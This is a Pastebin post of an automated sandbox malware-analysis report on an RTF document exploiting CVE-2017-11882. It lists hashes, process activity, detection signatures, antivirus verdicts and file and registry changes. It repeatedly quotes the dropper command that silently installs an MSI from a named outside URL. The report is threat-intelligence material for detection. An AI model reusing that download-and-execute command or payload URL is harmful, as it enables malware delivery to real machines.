API tools faq
paste
Advertisement
paladin316

1695RTF_7bf3ae38dce045ad13937af9758c92e6_doc_2019-09-12_17_30.txt

paladin316
Sep 12th, 2019
2,603
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.36 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 1695
  3. * MalFamily: "CVE-2017-11882"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "RTF_7bf3ae38dce045ad13937af9758c92e6.doc"
  8. * File Size: 267473
  9. * File Type: "Rich Text Format data, version 1, unknown character set"
  10. * SHA256: "c21659b89b91c447b63993d2a169907afa432933ce32bb07357c86134de654b8"
  11. * MD5: "7bf3ae38dce045ad13937af9758c92e6"
  12. * SHA1: "8bf693003fd3e6d7aa487317fb3b7a6651197b1e"
  13. * SHA512: "c577be0ca5dd1ae3d2db89d728e7d2cb59f0df5bd35d8367a1b8e33e4994cd2c60e4528be9185b843b24dbbd2156c0317b30bfac88dd51dc3fa6207a03e8d2d4"
  14. * CRC32: "20EE51CA"
  15. * SSDEEP: "1536:sxxQW3ydnXEavohq0F3BYyEau8b56acpBb:sxt3NavohHCyAYu"
  16.  
  17. * Process Execution:
  18. "WINWORD.EXE",
  19. "services.exe",
  20. "svchost.exe",
  21. "EQNEDT32.EXE",
  22. "cmd.exe",
  23. "msiexec.exe",
  24. "EQNEDT32.EXE",
  25. "msiexec.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "WerFault.exe",
  29. "WerFault.exe",
  30. "WerFault.exe",
  31. "wermgr.exe",
  32. "OSPPSVC.EXE",
  33. "svchost.exe",
  34. "explorer.exe",
  35. "dwm.exe"
  36.  
  37.  
  38. * Executed Commands:
  39. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
  40. "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
  41. "msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
  42. "C:\\Windows\\system32\\msiexec.exe /V",
  43. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  44. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE\"",
  45. "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2388 -s 412",
  46. "C:\\Windows\\system32\\WerFault.exe -u -p 2464 -s 568",
  47. "werfault.exe /h /shared Global\\3a008cb8a8a343b69cfbf1705af540a3",
  48. "C:\\Windows\\system32\\werfault.exe -pr Global\\9257F125FFD5B45B",
  49. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\""
  50.  
  51.  
  52. * Signatures Detected:
  53.  
  54. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  55. "Details":
  56.  
  57.  
  58. "Description": "At least one process apparently crashed during execution",
  59. "Details":
  60.  
  61.  
  62. "Description": "Scheduled file move on reboot detected",
  63. "Details":
  64.  
  65. "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
  71. "Details":
  72.  
  73. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "The RTF file contains embedded content",
  79. "Details":
  80.  
  81. "embedded content": "Object 2 index 0000BF6Bh contains embedded object cT6VvSve.3 with size 3584 bytes"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "NtCreateThreadEx: newly created thread hidden from debugger",
  87. "Details":
  88.  
  89.  
  90. "Description": "Anomalous file deletion behavior detected (10+)",
  91. "Details":
  92.  
  93. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml"
  94.  
  95.  
  96. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp"
  97.  
  98.  
  99. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  100.  
  101.  
  102. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  103.  
  104.  
  105. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp"
  106.  
  107.  
  108. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
  109.  
  110.  
  111. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp"
  112.  
  113.  
  114. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
  115.  
  116.  
  117. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp"
  118.  
  119.  
  120. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
  121.  
  122.  
  123. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  124.  
  125.  
  126. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
  127.  
  128.  
  129. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
  130.  
  131.  
  132. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
  133.  
  134.  
  135. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  136.  
  137.  
  138. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp"
  139.  
  140.  
  141. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  142.  
  143.  
  144. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  145.  
  146.  
  147. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp"
  148.  
  149.  
  150. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
  151.  
  152.  
  153. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp"
  154.  
  155.  
  156. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
  157.  
  158.  
  159. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp"
  160.  
  161.  
  162. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
  163.  
  164.  
  165. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  166.  
  167.  
  168. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
  169.  
  170.  
  171. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
  172.  
  173.  
  174. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
  175.  
  176.  
  177. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp"
  178.  
  179.  
  180. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  181.  
  182.  
  183. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  184.  
  185.  
  186. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp"
  187.  
  188.  
  189. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
  190.  
  191.  
  192. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp"
  193.  
  194.  
  195. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
  196.  
  197.  
  198. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp"
  199.  
  200.  
  201. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
  202.  
  203.  
  204. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp"
  205.  
  206.  
  207. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
  208.  
  209.  
  210. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr"
  211.  
  212.  
  213. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  214.  
  215.  
  216. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
  217.  
  218.  
  219. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
  220.  
  221.  
  222. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
  223.  
  224.  
  225. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
  226.  
  227.  
  228. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp"
  229.  
  230.  
  231. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
  232.  
  233.  
  234. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
  235.  
  236.  
  237.  
  238.  
  239. "Description": "Expresses interest in specific running processes",
  240. "Details":
  241.  
  242. "process": "OSPPSVC.EXE"
  243.  
  244.  
  245. "process": "WINWORD.EXE"
  246.  
  247.  
  248.  
  249.  
  250. "Description": "A HTTP/S link was seen in a script or command line",
  251. "Details":
  252.  
  253. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  254.  
  255.  
  256.  
  257.  
  258. "Description": "The RTF file has an unknown character set",
  259. "Details":
  260.  
  261.  
  262. "Description": "Uses Windows utilities for basic functionality",
  263. "Details":
  264.  
  265. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  266.  
  267.  
  268.  
  269.  
  270. "Description": "Sniffs keystrokes",
  271. "Details":
  272.  
  273. "SetWindowsHookExW": "Process: explorer.exe(1960)"
  274.  
  275.  
  276.  
  277.  
  278. "Description": "Code injection with CreateRemoteThread in a remote process",
  279. "Details":
  280.  
  281. "Injection": "WerFault.exe(2796) -> WINWORD.EXE(3068)"
  282.  
  283.  
  284.  
  285.  
  286. "Description": "Behavioural detection: Injection (inter-process)",
  287. "Details":
  288.  
  289.  
  290. "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
  291. "Details":
  292.  
  293.  
  294. "Description": "Behavioural detection: Transacted Hollowing",
  295. "Details":
  296.  
  297.  
  298. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  299. "Details":
  300.  
  301. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 1572664 times"
  302.  
  303.  
  304.  
  305.  
  306. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
  307. "Details":
  308.  
  309. "created_process": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet "
  310.  
  311.  
  312.  
  313.  
  314. "Description": "Stack pivoting was detected when using a critical API",
  315. "Details":
  316.  
  317. "process": "EQNEDT32.EXE:2388"
  318.  
  319.  
  320. "process": "msiexec.exe:2124"
  321.  
  322.  
  323.  
  324.  
  325. "Description": "Creates a hidden or system file",
  326. "Details":
  327.  
  328. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc"
  329.  
  330.  
  331.  
  332.  
  333. "Description": "File has been identified by 31 Antiviruses on VirusTotal as malicious",
  334. "Details":
  335.  
  336. "MicroWorld-eScan": "Exploit.RTF-ObfsStrm.Gen"
  337.  
  338.  
  339. "FireEye": "Exploit.RTF-ObfsStrm.Gen"
  340.  
  341.  
  342. "CAT-QuickHeal": "Exp.RTF.Obfus.Gen"
  343.  
  344.  
  345. "McAfee": "Exploit-CVE2017-11882.ah"
  346.  
  347.  
  348. "Arcabit": "Exploit.RTF-ObfsStrm.Gen"
  349.  
  350.  
  351. "Symantec": "Bloodhound.RTF.12"
  352.  
  353.  
  354. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
  355.  
  356.  
  357. "TrendMicro-HouseCall": "Possible_SMBCVE20170199"
  358.  
  359.  
  360. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
  361.  
  362.  
  363. "BitDefender": "Exploit.RTF-ObfsStrm.Gen"
  364.  
  365.  
  366. "Ad-Aware": "Exploit.RTF-ObfsStrm.Gen"
  367.  
  368.  
  369. "Emsisoft": "Exploit.RTF-ObfsStrm.Gen (B)"
  370.  
  371.  
  372. "Comodo": "Exploit.W97M.CVE2017-11882.AG@843jmy"
  373.  
  374.  
  375. "F-Secure": "Heuristic.HEUR/Rtf.Malformed"
  376.  
  377.  
  378. "DrWeb": "Exploit.Rtf.CVE2012-0158"
  379.  
  380.  
  381. "TrendMicro": "Possible_SMBCVE20170199"
  382.  
  383.  
  384. "McAfee-GW-Edition": "Exploit-CVE2017-11882.ah"
  385.  
  386.  
  387. "Sophos": "Exp/201711882-P"
  388.  
  389.  
  390. "Cyren": "CVE-2017-11882!Camelot"
  391.  
  392.  
  393. "Avira": "HEUR/Rtf.Malformed"
  394.  
  395.  
  396. "MAX": "malware (ai score=83)"
  397.  
  398.  
  399. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
  400.  
  401.  
  402. "Microsoft": "Trojan:Script/Foretype.A!ml"
  403.  
  404.  
  405. "ZoneAlarm": "HEUR:Exploit.RTF.CVE-2017-11882.gen"
  406.  
  407.  
  408. "GData": "Exploit.RTF-ObfsStrm.Gen"
  409.  
  410.  
  411. "AhnLab-V3": "RTF/Malform-C.Gen"
  412.  
  413.  
  414. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  415.  
  416.  
  417. "Zoner": "Probably RTFObfuscation"
  418.  
  419.  
  420. "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
  421.  
  422.  
  423. "Ikarus": "Exploit.CVE-2017-11882"
  424.  
  425.  
  426. "Qihoo-360": "susp.rtf.objupdate.gen"
  427.  
  428.  
  429.  
  430.  
  431. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  432. "Details":
  433.  
  434.  
  435. "Description": "The RTF file contains an object with potential exploit code",
  436. "Details":
  437.  
  438. "cve": "Object 2 index 0000BF6Bh contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
  439.  
  440.  
  441.  
  442.  
  443.  
  444. * Started Service:
  445. "osppsvc",
  446. "msiserver",
  447. "WerSvc"
  448.  
  449.  
  450. * Mutexes:
  451. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  452. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  453. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  454. "CicLoadWinStaWinSta0",
  455. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  456. "Global\\_MSIExecute",
  457. "Local\\WERReportingForProcess2388",
  458. "Global\\ca344605-d57d-11e9-8070-18c086cd4729",
  459. "Local\\WERReportingForProcess2464",
  460. "Global\\\\xe5\\x88\\x90\\xc7\\x9a",
  461. "Local\\WERReportingForProcess3068",
  462. "Global\\e6da076c-d57d-11e9-8070-18c086cd4729",
  463. "Global\\\\xed\\xac\\xb0\\xcd\\x9e",
  464. "WERUI_APPCRASH-c6a08aebbdac3f74ea291cf85a7fb8436eb98a5"
  465.  
  466.  
  467. * Modified Files:
  468. "C:\\Users\\user\\AppData\\Local\\Temp\\mnvi7zfcZsR3.doc",
  469. "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc",
  470. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRFFC3B42BF-0963-4DFD-8D4D-A3DC30366FA7.tmp",
  471. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS862D9AF4-6C86-4A2B-9EAC-76489E7C8F83.tmp",
  472. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS8526D782-2370-4052-99E7-C3D049572C10.tmp",
  473. "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
  474. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
  475. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
  476. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
  477. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
  478. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue",
  479. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB4EA.tmp.appcompat.txt",
  480. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB5B6.tmp.WERInternalMetadata.xml",
  481. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB615.tmp.hdmp",
  482. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERBE44.tmp.mdmp",
  483. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\Report.wer",
  484. "C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat",
  485. "\\??\\PIPE\\srvsvc",
  486. "\\Device\\LanmanDatagramReceiver",
  487. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  488. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  489. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  490. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
  491. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
  492. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
  493. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
  494. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER6E47.tmp.appcompat.txt",
  495. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER727E.tmp.WERInternalMetadata.xml",
  496. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER731C.tmp.hdmp",
  497. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WERA75C.tmp.mdmp",
  498. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer",
  499. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
  500. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
  501. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
  502. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
  503. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
  504. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\CVR9656.tmp.cvr",
  505. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERADB2.tmp.appcompat.txt",
  506. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERD918.tmp.WERInternalMetadata.xml",
  507. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER16CE.tmp.xml",
  508. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER17B9.tmp.hdmp",
  509. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER44B6.tmp.mdmp",
  510. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\Report.wer",
  511. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
  512. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
  513.  
  514.  
  515. * Deleted Files:
  516. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  517. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
  518. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp",
  519. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
  520. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp",
  521. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
  522. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp",
  523. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
  524. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp",
  525. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
  526. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  527. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp",
  528. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
  529. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp",
  530. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
  531. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp",
  532. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
  533. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp",
  534. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
  535. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp",
  536. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
  537. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp",
  538. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
  539. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp",
  540. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp",
  542. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
  543. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp",
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
  545. "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
  546. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp",
  547. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
  548. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
  549.  
  550.  
  551. * Modified Registry Keys:
  552. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
  553. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  554. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  555. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  556. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  557. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  558. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  559. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  560. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  561. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34",
  562. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34\\CA5C34",
  563. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  564. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  565. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  566. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  567. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
